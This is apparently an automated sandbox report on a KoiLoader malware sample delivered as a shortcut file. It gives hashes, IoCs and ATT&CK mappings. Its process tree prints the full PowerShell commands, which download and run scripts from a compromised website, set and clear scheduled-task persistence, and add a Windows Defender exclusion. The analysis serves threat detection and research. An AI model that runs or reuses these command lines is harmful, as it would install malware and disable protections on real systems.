koiloader | f2a993d66e959f8358bcb7023095655856c9f9a172c20a1b92042077a05a7916

Analysis

max time kernel
147s
max time network
148s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
08/11/2024, 16:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

01_11_2024_stmnt.lnk
Size

3KB
MD5

d9b3bfc5bb4ae12f08c3ccd71b73bec2
SHA1

ab60d0f7cbcb1df3b46b2df0dda5734ec922fd12
SHA256

12d59541e4ce7bdfe5c346151de3fec00f2d096d662b9762d50a36097d41829e
SHA512

38bea311ece6d92dcbd8c4a4e30c504ea1181e26fe6d9106365a71b7d069b78fa6bc2e0daa56fce45613d2ba2e878799893b6f632d3e54c8f73d3fbaf776d6f0

Score

10^/10

koiloader defense_evasion discovery execution loader

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/stomachersjkl.php

exe.dropper

https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/destineziteQaJxo.php

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/nonmajoritieskvr.php

exe.dropper

https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/uninwreathedslZC.ps1

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/nonmajoritieskvr.php

exe.dropper

https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/uninwreathedslZC.ps1

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/nonmajoritieskvr.php

exe.dropper

https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/uninwreathedslZC.ps1

Extracted

Family

koiloader

http://82.118.19.30/stripper.php

Attributes

payload_url
https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04

Signatures

KoiLoader
KoiLoader is a malware loader written in C++.
loader koiloader
Koiloader family
koiloader

Detects KoiLoader payload 3 IoCs

loader

resource	yara_rule
behavioral1/memory/556-55-0x00000000084C0000-0x00000000084CD000-memory.dmp	family_koi_loader
behavioral1/memory/2208-127-0x00000000078F0000-0x00000000078FD000-memory.dmp	family_koi_loader
behavioral1/memory/732-152-0x0000000007FD0000-0x0000000007FDD000-memory.dmp	family_koi_loader

Blocklisted process makes network request 11 IoCs

flow	pid	Process
2	2420	powershell.exe
4	1892	powershell.exe
5	556	powershell.exe
6	556	powershell.exe
7	4268	powershell.exe
8	4268	powershell.exe
9	1160	powershell.exe
10	2208	powershell.exe
12	556	powershell.exe
13	2332	powershell.exe
14	732	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
556	powershell.exe
2208	powershell.exe
732	powershell.exe
2472	powershell.exe
4268	powershell.exe
2420	powershell.exe

Indicator Removal: Clear Persistence 1 TTPs 3 IoCs

Clear artifacts associated with previously established persistence like scheduletasks on a host.

defense_evasion

Clear Persistence

T1070.009

pid	Process
1892	powershell.exe
1160	powershell.exe
2332	powershell.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DllHost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3388	schtasks.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
2420	powershell.exe
2420	powershell.exe
1892	powershell.exe
1892	powershell.exe
556	powershell.exe
556	powershell.exe
2472	powershell.exe
2472	powershell.exe
4268	powershell.exe
4268	powershell.exe
1160	powershell.exe
1160	powershell.exe
2208	powershell.exe
2208	powershell.exe
2332	powershell.exe
2332	powershell.exe
732	powershell.exe
732	powershell.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

description	pid	Process
Token: SeDebugPrivilege	2420	powershell.exe
Token: SeDebugPrivilege	1892	powershell.exe
Token: SeDebugPrivilege	556	powershell.exe
Token: SeDebugPrivilege	2472	powershell.exe
Token: SeDebugPrivilege	4268	powershell.exe
Token: SeDebugPrivilege	1160	powershell.exe
Token: SeDebugPrivilege	2208	powershell.exe
Token: SeDebugPrivilege	2332	powershell.exe
Token: SeDebugPrivilege	732	powershell.exe

Suspicious use of WriteProcessMemory 43 IoCs

description	pid	Process	procid_target
PID 4712 wrote to memory of 2420	4712	cmd.exe	80
PID 4712 wrote to memory of 2420	4712	cmd.exe	80
PID 2420 wrote to memory of 3388	2420	powershell.exe	82
PID 2420 wrote to memory of 3388	2420	powershell.exe	82
PID 4888 wrote to memory of 1892	4888	wscript.EXE	84
PID 4888 wrote to memory of 1892	4888	wscript.EXE	84
PID 1892 wrote to memory of 2792	1892	powershell.exe	86
PID 1892 wrote to memory of 2792	1892	powershell.exe	86
PID 1892 wrote to memory of 2296	1892	powershell.exe	87
PID 1892 wrote to memory of 2296	1892	powershell.exe	87
PID 2296 wrote to memory of 556	2296	wscript.exe	89
PID 2296 wrote to memory of 556	2296	wscript.exe	89
PID 2296 wrote to memory of 556	2296	wscript.exe	89
PID 3848 wrote to memory of 2316	3848	DllHost.exe	92
PID 3848 wrote to memory of 2316	3848	DllHost.exe	92
PID 3848 wrote to memory of 2316	3848	DllHost.exe	92
PID 2316 wrote to memory of 2472	2316	cmd.exe	94
PID 2316 wrote to memory of 2472	2316	cmd.exe	94
PID 2316 wrote to memory of 2472	2316	cmd.exe	94
PID 556 wrote to memory of 732	556	powershell.exe	95
PID 556 wrote to memory of 732	556	powershell.exe	95
PID 556 wrote to memory of 732	556	powershell.exe	95
PID 732 wrote to memory of 4268	732	cmd.exe	97
PID 732 wrote to memory of 4268	732	cmd.exe	97
PID 732 wrote to memory of 4268	732	cmd.exe	97
PID 4960 wrote to memory of 1160	4960	wscript.EXE	100
PID 4960 wrote to memory of 1160	4960	wscript.EXE	100
PID 1160 wrote to memory of 3940	1160	powershell.exe	102
PID 1160 wrote to memory of 3940	1160	powershell.exe	102
PID 1160 wrote to memory of 2824	1160	powershell.exe	103
PID 1160 wrote to memory of 2824	1160	powershell.exe	103
PID 2824 wrote to memory of 2208	2824	wscript.exe	104
PID 2824 wrote to memory of 2208	2824	wscript.exe	104
PID 2824 wrote to memory of 2208	2824	wscript.exe	104
PID 3032 wrote to memory of 2332	3032	wscript.EXE	108
PID 3032 wrote to memory of 2332	3032	wscript.EXE	108
PID 2332 wrote to memory of 3944	2332	powershell.exe	110
PID 2332 wrote to memory of 3944	2332	powershell.exe	110
PID 2332 wrote to memory of 2668	2332	powershell.exe	111
PID 2332 wrote to memory of 2668	2332	powershell.exe	111
PID 2668 wrote to memory of 732	2668	wscript.exe	112
PID 2668 wrote to memory of 732	2668	wscript.exe	112
PID 2668 wrote to memory of 732	2668	wscript.exe	112

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\01_11_2024_stmnt.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:4712
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comma [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $g21Qt8Fs4AYjWaTive = New-Object Net.WebClient; $hto = $g21Qt8Fs4AYjWaTive.DownloadData('https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/stomachersjkl.php'); $g21Qt8Fs4AYjWaTive.DownloadFile('https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/destineziteQaJxo.php', 'gE1sWzFkjThmeR.js'); schtasks /create /sc minute /f /mo 1 /tr ([System.Text.Encoding]::UTF8.GetString($hto) + $env:programdata + '\' + ('gE1sWzFkjThmeR.js ' * 2)) /tn PVN5ibu1j;
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2420
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /sc minute /f /mo 1 /tr "wscript C:\ProgramData\gE1sWzFkjThmeR.js gE1sWzFkjThmeR.js " /tn PVN5ibu1j
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3388

C:\Windows\system32\wscript.EXE
C:\Windows\system32\wscript.EXE C:\ProgramData\gE1sWzFkjThmeR.js gE1sWzFkjThmeR.js
1⤵
- Suspicious use of WriteProcessMemory
PID:4888
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\BTB1F8IIM4QD.js -usebasi 'https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/vulvaehP4l.php'; schtasks /delete /tn gE1sWzFkjThmeR.js /f; wscript $env:programdata\BTB1F8IIM4QD.js "
  2⤵
  - Blocklisted process makes network request
  - Indicator Removal: Clear Persistence
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1892
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /delete /tn gE1sWzFkjThmeR.js /f
    3⤵
    PID:2792
- - C:\Windows\system32\wscript.exe
    "C:\Windows\system32\wscript.exe" C:\ProgramData\BTB1F8IIM4QD.js
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2296
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$l1 = 'https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/nonmajoritieskvr.php'; $l2 = 'https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/uninwreathedslZC.ps1'; $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*siU*s') {$c=$b}}; $env:paths = '7z2E44DN04TE'; IEX(Invoke-WebRequest -UseBasicParsing $l1); IEX(Invoke-WebRequest -UseBasicParsing $l2)"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:556
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "powershell -command IEX(IWR -UseBasicParsing 'https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/sd2.ps1')"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:732
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command IEX(IWR -UseBasicParsing 'https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/sd2.ps1')
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4268

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3848
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2316
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2472

C:\Windows\System32\wscript.exe
C:\Windows\System32\wscript.exe "C:\ProgramData\r02510207-a8a1-401b-a8b2-969e44fe3fefr.js"
1⤵
PID:2028

C:\Windows\system32\wscript.EXE
C:\Windows\system32\wscript.EXE C:\ProgramData\gE1sWzFkjThmeR.js gE1sWzFkjThmeR.js
1⤵
- Suspicious use of WriteProcessMemory
PID:4960
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\BTB1F8IIM4QD.js -usebasi 'https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/vulvaehP4l.php'; schtasks /delete /tn gE1sWzFkjThmeR.js /f; wscript $env:programdata\BTB1F8IIM4QD.js "
  2⤵
  - Blocklisted process makes network request
  - Indicator Removal: Clear Persistence
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1160
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /delete /tn gE1sWzFkjThmeR.js /f
    3⤵
    PID:3940
- - C:\Windows\system32\wscript.exe
    "C:\Windows\system32\wscript.exe" C:\ProgramData\BTB1F8IIM4QD.js
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2824
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$l1 = 'https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/nonmajoritieskvr.php'; $l2 = 'https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/uninwreathedslZC.ps1'; $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*siU*s') {$c=$b}}; $env:paths = '7zWXW5OK2POI'; IEX(Invoke-WebRequest -UseBasicParsing $l1); IEX(Invoke-WebRequest -UseBasicParsing $l2)"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2208

C:\Windows\System32\wscript.exe
C:\Windows\System32\wscript.exe "C:\ProgramData\r02510207-a8a1-401b-a8b2-969e44fe3fefr.js"
1⤵
PID:3672

C:\Windows\system32\wscript.EXE
C:\Windows\system32\wscript.EXE C:\ProgramData\gE1sWzFkjThmeR.js gE1sWzFkjThmeR.js
1⤵
- Suspicious use of WriteProcessMemory
PID:3032
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\BTB1F8IIM4QD.js -usebasi 'https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/vulvaehP4l.php'; schtasks /delete /tn gE1sWzFkjThmeR.js /f; wscript $env:programdata\BTB1F8IIM4QD.js "
  2⤵
  - Blocklisted process makes network request
  - Indicator Removal: Clear Persistence
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2332
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /delete /tn gE1sWzFkjThmeR.js /f
    3⤵
    PID:3944
- - C:\Windows\system32\wscript.exe
    "C:\Windows\system32\wscript.exe" C:\ProgramData\BTB1F8IIM4QD.js
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2668
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$l1 = 'https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/nonmajoritieskvr.php'; $l2 = 'https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/uninwreathedslZC.ps1'; $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*siU*s') {$c=$b}}; $env:paths = '7zF8XLPN799Z'; IEX(Invoke-WebRequest -UseBasicParsing $l1); IEX(Invoke-WebRequest -UseBasicParsing $l2)"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:732

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Indicator Removal

T1070

Clear Persistence

T1070.009

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\BTB1F8IIM4QD.js

Filesize
1KB

MD5
e2086b7005e0a2b5715cf9688d114e65

SHA1
e1af673e8057943de2adfd133c1339b919d20f52

SHA256
544973c6c46a48a9197a556900d8f92a22695858ba8595f17fc353b33889785e

SHA512
fb3902147f1f217ce3f9abe7199b7741366f46c1ee5354a47877eff79727cc3be1107246d6be7cc85bb4044e6c672aa7dda3f1e25a4d74b714512a42803a86e8

Download Submit
C:\ProgramData\BTB1F8IIM4QD.js

Filesize
1KB

MD5
d8ff77391671cf2c35c6046869666789

SHA1
cfe305868cfdffa983382ce929d8ea4ce1ee29cb

SHA256
747af2f4811a9f6d50e985a7f1945a767d4d4b9e2c1bee2d7e3570080fd3d6df

SHA512
f1ec0856256e4c0c376737295784022bb4f32e237ce9a3df7890f2f1fd28448ee5cb72db967bd58fda925a554da72138f59f5a82a80480e481e70156d74fa05b

Download Submit
C:\ProgramData\BTB1F8IIM4QD.js

Filesize
1KB

MD5
912da8884511d851c094313acb286e83

SHA1
c4ea3b7e3b74445d05da5fb5b7379b01bdb8f331

SHA256
142819335ee7e922256832778f25fb85ef97bfa05e43a1aea6fb41d337222daa

SHA512
c44459e9a63bc36b2ff7e9fc898cce9a67edf84fdbfc60d220dd4da42725383d91df3f62c3e6ba5584cb597d142619d515b57bf2abff2fcc24d0f07746eb910c

Download Submit
C:\ProgramData\gE1sWzFkjThmeR.js

Filesize
315B

MD5
0254c2d1a7d15b9d28423157faddd95d

SHA1
7a60c13cbafa0aa8623d02c42c351140ad4b3d17

SHA256
d22f168b1c45f3a49c3b690a8e332a0bf9e794eedb31c531d995bf717f59df7f

SHA512
783ed7bc034fbcab8d17ed41b7613f7c6c290653a5bc5368090832aac056351e52fd38d2742d02f50b57dba425be49b8e5592687e16288baa8ff0be9b1bdd9d3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
5f4c933102a824f41e258078e34165a7

SHA1
d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee

SHA256
d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2

SHA512
a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
ac4917a885cf6050b1a483e4bc4d2ea5

SHA1
b1c0a9f27bd21c6bbb8e9be70db8777b4a2a640f

SHA256
e39062a62c3c7617feeeff95ea8a0be51104a0d36f46e44eea22556fda74d8d9

SHA512
092c67a3ecae1d187cad72a8ea1ea37cb78a0cf79c2cd7fb88953e5990669a2e871267015762fd46d274badb88ac0c1d73b00f1df7394d89bed48a3a45c2ba3d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
60KB

MD5
0a9da256ffcfe42119c7a351e5eaaa9c

SHA1
c992b8e18cfc24faee739511beb5094189806177

SHA256
f4750e5af8c84626318382887c9c17e6555eff006af7d7e88cadd562ab2ee8ed

SHA512
451f4d470fe938a7c71d340f0711a9d1cb98f542138bd95584244471fa5f31beba8274699be1e497742ce91182dc9e308ca2d9ce3d004174a8228cca4c118672

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
e591f0e5885a13c711258918f7942d40

SHA1
f595db3854c4225734d09c57b160f508f1b8d263

SHA256
20fd65820b42594110d892aa8b5355366ffa1dc1b84d85745778a3ce8ad640ff

SHA512
fbb3dbd4af3cfb59786d8a0e2d40b30eb25a47c7df6f53b75e580c0b05d1cb21941c1c74214b5f1b8e1c6a82d7112a87fbde01919a0d1cdacad08f99eab8f5d2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
64a4de6ca3e813d7e7a1eacae48e0c9c

SHA1
818b7103d28fc9fd55017cb655757720cb423d63

SHA256
d39af384eab6fe28e679d8e3b4fc9fa811c1df8d88b2dd9e6cf397c506095ae5

SHA512
7e4b085e7593857d84949d8da281fa309c241c316011288bf1b96b3595c7a32f0739c876f007647db770951069ef0c683381843dee9f1821f7c0c62646ee93da

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e119f8fc8d416324e8424fa64fb60390

SHA1
49dc914ed4f32b7e95849123404577f00100a855

SHA256
1f26417ccfbf2853790ed0a7c78c9e9fee1a0c2ed7e09aad74425b44a20f667e

SHA512
b1af0e41cc8ff75f6984a4c1ae06b2b65bea1bede4666b9227c654624666ef76de59275093721c3e4968a19116f911aae439b71327ce3ccd814ecff0accacdfe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
371ac0b948586f6551359d1e5cc7ce6a

SHA1
e2e3b8930edaec9752d2a87f9ce512a3dd320eeb

SHA256
a187893f567559aa34c3a11386eb2553d56ede8e3ebec1394cdb44550bc3c7ae

SHA512
4c4c8c8dccef9569ea5c0decacbff5540487001edf779fe35ece83801e0f26f07e6f36faa8d576f0efa75fdd28593b632a39091a0d128503187320fe661bec6a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8117d1162c008cf731fe668d81f95ac0

SHA1
1fdce919b160546d65f946726794b3331de06938

SHA256
1081c6b484e3ce0572ea539029bc598ee7870cf099c5585bd52fbeee220c56b7

SHA512
711cc338d15b6b36cad3e8ca1a57b0595991f060d24f39faa2b24a2c4ca08c07c82497ed8b1bfbc998452778d75fb24558d72062ef5ee6848d99e35068c5f188

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
12ff85d31d9e76455b77e6658cb06bf0

SHA1
45788e71d4a7fe9fd70b2c0e9494174b01f385eb

SHA256
1c60ff7821e36304d7b4bcdd351a10da3685e9376775d8599f6d6103b688a056

SHA512
fcc4084ab70e49821a3095eeac1ef85cf02c73fdb787047f9f6b345132f069c566581921fac98fab5ddec1a550c266304cce186e1d46957946b6f66dba764d2f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3ar0i5dy.cbb.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/556-35-0x0000000005980000-0x0000000005FAA000-memory.dmp

Filesize
6.2MB

Download
memory/556-38-0x0000000006020000-0x0000000006086000-memory.dmp

Filesize
408KB

Download
memory/556-51-0x0000000006980000-0x000000000699A000-memory.dmp

Filesize
104KB

Download
memory/556-52-0x0000000007D40000-0x00000000083BA000-memory.dmp

Filesize
6.5MB

Download
memory/556-53-0x00000000083D0000-0x00000000083D1000-memory.dmp

Filesize
4KB

Download
memory/556-55-0x00000000084C0000-0x00000000084CD000-memory.dmp

Filesize
52KB

Download
memory/556-34-0x00000000031B0000-0x00000000031E6000-memory.dmp

Filesize
216KB

Download
memory/556-36-0x0000000005880000-0x00000000058A2000-memory.dmp

Filesize
136KB

Download
memory/556-37-0x0000000005FB0000-0x0000000006016000-memory.dmp

Filesize
408KB

Download
memory/556-50-0x0000000006670000-0x00000000066BC000-memory.dmp

Filesize
304KB

Download
memory/556-49-0x0000000006640000-0x000000000665E000-memory.dmp

Filesize
120KB

Download
memory/556-44-0x0000000006110000-0x0000000006467000-memory.dmp

Filesize
3.3MB

Download
memory/732-152-0x0000000007FD0000-0x0000000007FDD000-memory.dmp

Filesize
52KB

Download
memory/2208-127-0x00000000078F0000-0x00000000078FD000-memory.dmp

Filesize
52KB

Download
memory/2420-18-0x00007FFDAFF50000-0x00007FFDB0A12000-memory.dmp

Filesize
10.8MB

Download
memory/2420-14-0x00007FFDAFF50000-0x00007FFDB0A12000-memory.dmp

Filesize
10.8MB

Download
memory/2420-13-0x00007FFDAFF50000-0x00007FFDB0A12000-memory.dmp

Filesize
10.8MB

Download
memory/2420-12-0x00007FFDAFF50000-0x00007FFDB0A12000-memory.dmp

Filesize
10.8MB

Download
memory/2420-11-0x00000262AEC90000-0x00000262AECB2000-memory.dmp

Filesize
136KB

Download
memory/2420-2-0x00007FFDAFF53000-0x00007FFDAFF55000-memory.dmp

Filesize
8KB

Download
memory/2472-66-0x0000000007170000-0x00000000071A4000-memory.dmp

Filesize
208KB

Download
memory/2472-80-0x0000000007510000-0x0000000007521000-memory.dmp

Filesize
68KB

Download
memory/2472-67-0x0000000070A30000-0x0000000070A7C000-memory.dmp

Filesize
304KB

Download
memory/2472-76-0x00000000071B0000-0x00000000071CE000-memory.dmp

Filesize
120KB

Download
memory/2472-77-0x00000000071D0000-0x0000000007274000-memory.dmp

Filesize
656KB

Download
memory/2472-78-0x0000000007380000-0x000000000738A000-memory.dmp

Filesize
40KB

Download
memory/2472-92-0x0000000007640000-0x0000000007648000-memory.dmp

Filesize
32KB

Download
memory/2472-91-0x0000000007650000-0x000000000766A000-memory.dmp

Filesize
104KB

Download
memory/2472-87-0x0000000007550000-0x0000000007565000-memory.dmp

Filesize
84KB

Download
memory/2472-81-0x0000000007540000-0x000000000754E000-memory.dmp

Filesize
56KB

Download
memory/2472-79-0x0000000007590000-0x0000000007626000-memory.dmp

Filesize
600KB

Download
memory/4268-95-0x0000000007AB0000-0x0000000007AD2000-memory.dmp

Filesize
136KB

Download
memory/4268-99-0x0000000008420000-0x00000000084B2000-memory.dmp

Filesize
584KB

Download
memory/4268-98-0x0000000008330000-0x0000000008380000-memory.dmp

Filesize
320KB

Download
memory/4268-97-0x0000000007B50000-0x0000000007B6A000-memory.dmp

Filesize
104KB

Download
memory/4268-96-0x0000000008890000-0x0000000008E36000-memory.dmp

Filesize
5.6MB

Download